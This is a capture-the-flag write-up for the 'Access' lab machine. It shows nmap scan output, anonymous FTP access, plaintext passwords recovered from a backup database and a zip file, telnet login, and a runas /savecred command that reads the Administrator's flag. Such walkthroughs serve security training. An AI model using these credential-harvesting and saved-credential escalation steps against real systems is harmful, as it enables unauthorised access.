Access

OS: Windows, Difficulty: Easy, IP: 10.10.10.98

Initial Enumeration

# Nmap 7.70 scan initiated Thu Jul 25 23:30:51 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 21,23,80 10.10.10.98
Nmap scan report for 10.10.10.98
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst: 
|_  SYST: Windows_NT
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: MegaCorp
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|8.1|2012 (91%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (90%), Microsoft Windows Vista SP2 (90%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (89%), Microsoft Windows 8.1 Update 1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   236.52 ms 10.10.14.1
2   247.52 ms 10.10.10.98

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 25 23:33:57 2019 -- 1 IP address (1 host up) scanned in 186.20 seconds

FTP had anonymous login enabled, so I got few files from the FTP server. Files: 'Access Control.zip' and backup.mdb

From backup.mdb file I got auth_user data and got the password for engineer account with password access4u@security which let me unlock the 'Access Control.zip' file which revealed password for another account, security with password as 4Cc3ssC0ntr0ller

The security account had access to the telnet service which got me shell and got me the user flag.

User Own

C:\Users\security\Desktop>type user.txt                                    
ff1f3***

Root Own

C:\Users\Public>runas /savecred /user:ACCESS\Administrator "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\Public\FLAG"
C:\Users\Public>type FLAG            
6e158***

Learning Outcome

This was a fun box, I was not aware of runas tool and the savecred flag. Also, I learned about how to handle MS Access files on Linux.

PreviousJeevesNextActive

Last updated